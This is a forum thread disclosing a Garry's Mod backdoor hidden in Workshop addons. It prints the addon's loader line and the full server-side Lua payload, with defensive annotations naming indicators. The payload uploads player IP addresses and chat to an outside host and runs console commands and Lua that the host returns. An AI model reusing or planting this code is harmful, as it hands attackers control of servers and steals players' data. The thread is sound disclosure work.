So... a large number of Polish skids and a Polish "community" created a Garry's Mod backdoor which can fully take over any server.
Creator of backdoor: https://steamcommunity.com/profiles/76561198038819576/
Scripts with backdoor:
basically everything from below SteamID's like Fred (Flinstone) scripts...
It has some amazing features like:
all users which are using backdoor (with SteamID64, actual avatars and names)
https://files.facepunch.com/forum/upload/301844/0e2cf370-5687-4091-818c-45d9860330fe/1.png
amazing server list (with locked servers of backdoor's owner)
https://files.facepunch.com/forum/upload/301844/75da7341-5914-489d-bd0f-7c35eef804f1/2.png
server informations
https://files.facepunch.com/forum/upload/301844/6020eb5a-3d26-4c3d-a60c-1b5c89fdc23d/cHIsd.png
From this panel one can do anything to a server: run Lua code, run console commands, and see current information about the server such as its ISP, what type of server it is, which gamemode it is running, the map and more...
https://files.facepunch.com/forum/upload/301844/6f8939c7-4add-4db3-8c46-a6202d77f922/jeg7H.png
Below is the Lua script, which is only returned when the request's User-Agent is Valve HTTP Steam Client.
-- Loader line; the thread quotes this same line as "Line 21" of a Workshop addon.
-- 30 seconds after it runs, it requests a URL over plain HTTP and hands the whole
-- response body to RunString, so the remote host decides what Lua the server executes.
-- Review hint: an http.Fetch/http.Post callback that passes its body to RunString
-- is the pattern to search installed addons for; the host name and the apiCode
-- value in this URL are usable as indicators.
timer.Simple(30,function() http.Fetch("http://version.kaktusownia.com.pl/api/getcode?apiCode=aJbhsRFhXGfyYJyfxnkbHdl6EAQjQQ",function(body) RunString(body) end) end)
-- Annotated sample of the server-side script posted in the thread.
-- NOTE(review): presumably this is the body served by the getcode endpoint rather
-- than code shipped in the addon itself - confirm against a captured sample.
--
-- What the visible code does: registers the server with a remote host, uploads
-- per-player data (including IP addresses) and all chat, and every 10 seconds
-- polls the host for console commands and Lua source, which it then executes.
--
-- Indicators visible in this listing (useful for scanning a running server or addon files):
--   globals : bgApiKey, adressBG, hashBG, bgsnd, bgAddPlayerData
--   timer   : "bg_test"
--   hooks   : PlayerSay "BG chat text", PlayerInitialSpawn "BG player connect"
--   network : plain-HTTP requests to version.kaktusownia.com.pl under /api/
--             (register, player, update, chat, addinfo)
-- All requests go to that single host, so outbound filtering or logging of it covers every channel below.

-- Hard-coded key sent with the registration request; written to a global.
bgApiKey="JMUWCU21eXCR4BdJkR5NHNhGlSH9Cn"
-- Splits the server's "ip:port" string; [1] is used as the IP and [2] as the port.
adressBG = string.Explode(":",game.GetIPAddress())
-- Global state table: pregs holds SteamID64 values, recorded is a flag set in the loop below.
bgsnd = bgsnd or {}
bgsnd.pregs = {}
bgsnd.recorded = false
-- Runs only when the "bg_test" timer does not exist yet and the reported address is not 0.0.0.0.
if not timer.Exists( "bg_test" ) and adressBG[1] ~= "0.0.0.0" then
-- Registration payload: server address, hostname, key, slot count, map, tickrate, gamemode, uptime.
local dsend = {
ip=adressBG[1],
port=adressBG[2],
name=GetHostName(),
apikey=bgApiKey,
maxplayers=tostring(game.MaxPlayers()),
map=game.GetMap(),
tickrate = tostring(math.floor(1 / engine.TickInterval())),
gamemode = GAMEMODE_NAME,
uptime = tostring(RealTime())
}
-- Everything else is set up inside the callback of this registration request.
http.Post("http://version.kaktusownia.com.pl/api/register",dsend,function(bodyqw)
-- The response is parsed as JSON and its "hash" field is stored in a global;
-- every later request sends it back as the "hash" field.
hashBG = util.JSONToTable(bodyqw).hash
-- Global helper: uploads one human player's record. Bots and invalid entities are skipped.
-- The record contains SteamID64, IP address, user group, name and score/connection stats.
function bgAddPlayerData(ply)
if not IsValid(ply) or not ply:IsPlayer() or ply:IsBot() then return end
local bgplydat = {
steamid=ply:SteamID64(),
hash=hashBG,
ping=tostring(ply:Ping()),
ip=tostring(ply:IPAddress()),
frags=tostring(ply:Frags()),
deaths=tostring(ply:Deaths()),
timeconnected=tostring(ply:TimeConnected()),
group=tostring(ply:GetUserGroup()),
name=ply:Name()
}
-- Response is ignored (empty callback).
http.Post("http://version.kaktusownia.com.pl/api/player",bgplydat,function() end)
end
-- Removes a "bg_test" timer if one appeared since the check at the top, before recreating it.
if timer.Exists( "bg_test" ) then
timer.Remove("bg_test")
end
-- Uploads every player currently connected, skipping SteamID64 values already listed in bgsnd.pregs.
for i,k in pairs(player.GetAll()) do
bgsnd.pregs = bgsnd.pregs or {}
if table.HasValue( bgsnd.pregs, k:SteamID64() ) then continue end
bgsnd.recorded = true
bgAddPlayerData(k)
end
-- Repeating timer: 10-second interval, 0 repetitions argument (runs until removed).
-- Each tick uploads server and player state and then executes whatever the host sends back.
timer.Create("bg_test",10,0,function()
-- Builds the list of non-bot players with the same fields as bgAddPlayerData (minus the hash).
local function sortAllPlayersBG()
local sortedPlayers = {}
for i,k in pairs(player.GetAll()) do
if not IsValid(k) or k:IsBot() then continue end
table.insert(sortedPlayers,{
steamid=k:SteamID64(),
ping=tostring(k:Ping()),
ip=tostring(k:IPAddress()),
frags=tostring(k:Frags()),
deaths=tostring(k:Deaths()),
timeconnected=tostring(k:TimeConnected()),
group=tostring(k:GetUserGroup()),
name=k:Name()
})
end
return sortedPlayers
end
-- Status payload; the player list is embedded as a JSON string in the "players" field.
local sendData = {
hash=hashBG,
name=GetHostName(),
maxplayers=tostring(game.MaxPlayers()),
actualplayers=tostring(#player.GetAll()),
map=game.GetMap(),
players = util.TableToJSON(sortAllPlayersBG()),
tickrate = tostring(math.floor(1 / engine.TickInterval())),
bots = tostring(#player.GetBots()),
gamemode = GAMEMODE_NAME,
isdedicated = tostring(game.IsDedicated()),
uptime = tostring(RealTime())
}
-- Command channel: on an HTTP 200 response the body is parsed as JSON; each entry of
-- "commands" is run as a server console command and each entry of "codes" is run as Lua.
-- Nothing in this block validates or restricts what the host returns, so a server that has
-- run this timer should be reviewed as having accepted arbitrary remote commands.
http.Post("http://version.kaktusownia.com.pl/api/update",sendData,function(bgda,_,_,statusCode)
if statusCode ~= 200 then return end
local allData = util.JSONToTable(bgda)
local cmds = allData.commands or {}
local luaCodes = allData.codes or {}
for i,k in pairs(cmds) do
game.ConsoleCommand( k .. "\n" )
end
for i,k in pairs(luaCodes) do
RunString(k)
end
end)
end)
-- Chat capture: every PlayerSay event is posted with sender name, text, team flag and SteamID64.
hook.Add("PlayerSay","BG chat text",function(ply,text,isTeam)
http.Post("http://version.kaktusownia.com.pl/api/chat",{hash=hashBG,name=ply:Name(),text=text,team=isTeam,steamid=ply:SteamID64()},function(body)
end)
end)
-- Replaces the bgsnd table created at the top with a fresh one holding a small buffer API:
-- Start clears the buffer, Write appends its second argument, Send posts the buffer as JSON.
-- Nothing in this listing calls these three functions.
bgsnd = {}
bgsnd.data = bgsnd.data or {}
bgsnd.Start = function()
bgsnd.data = {}
end
bgsnd.Write = function(_,sds)
table.insert(bgsnd.data,sds)
end
bgsnd.Send = function()
http.Post("http://version.kaktusownia.com.pl/api/addinfo",{hash=hashBG,info=util.TableToJSON(bgsnd.data)},function(body)
end)
end
-- Join capture: 5 seconds after a player's initial spawn, their record is uploaded via
-- bgAddPlayerData, and their SteamID64 is appended to bgsnd.pregs when bgsnd.recorded is set.
hook.Add("PlayerInitialSpawn","BG player connect",function(ply)
timer.Simple(5,function()
bgsnd.pregs = bgsnd.pregs or {}
bgAddPlayerData(ply)
if bgsnd.recorded and IsValid(ply) and ply:IsPlayer() and not ply:IsBot() then
table.insert(bgsnd.pregs,ply:SteamID64())
end
end)
end)
end)
end
Like every serverside backdoor, this will only run if the server owner installs this. Is this being snuck/obfuscated into addons? Where did you find the script?
Where did I find this script? I saw his Console script a few months ago, and it was giving me some errors. I found some HTTP requests in the script which only worked from Garry's Mod (User-Agent: Valve Source HTTP Client); when I tried to access the URL directly I only got a blank screen. Where are these scripts? Basically, every one of Fredward's scripts has this request implemented in various places.
https://steamcommunity.com/sharedfiles/filedetails/?id=1393019092
Line 21: timer.Simple(30,function() http.Fetch("http://version.kaktusownia.com.pl/api/getcode?apiCode=aJbhsRFhXGfyYJyfxnkbHdl6EAQjQQ",function(body) RunString(body) end) end)
You should email the addons containing the backdoors to Rubat as per the sticky.
I sent an email a few days ago but there wasn't any sign of activity, so I also posted all the code here to inform all players about the backdoor.
I have not received any emails about this.
I also sent you another e-mail on Monday with some information, which may have been filtered because of the URLs. I will try to send it again later, without links but with attachments.
Said a biggest thief and scammer on Polish Gmod scene
JUST kiedy JvS
They have been caught on here before, on the massive backdoor addon dump, and I guess they're back at it again, is workshop restriction possible on those individuals?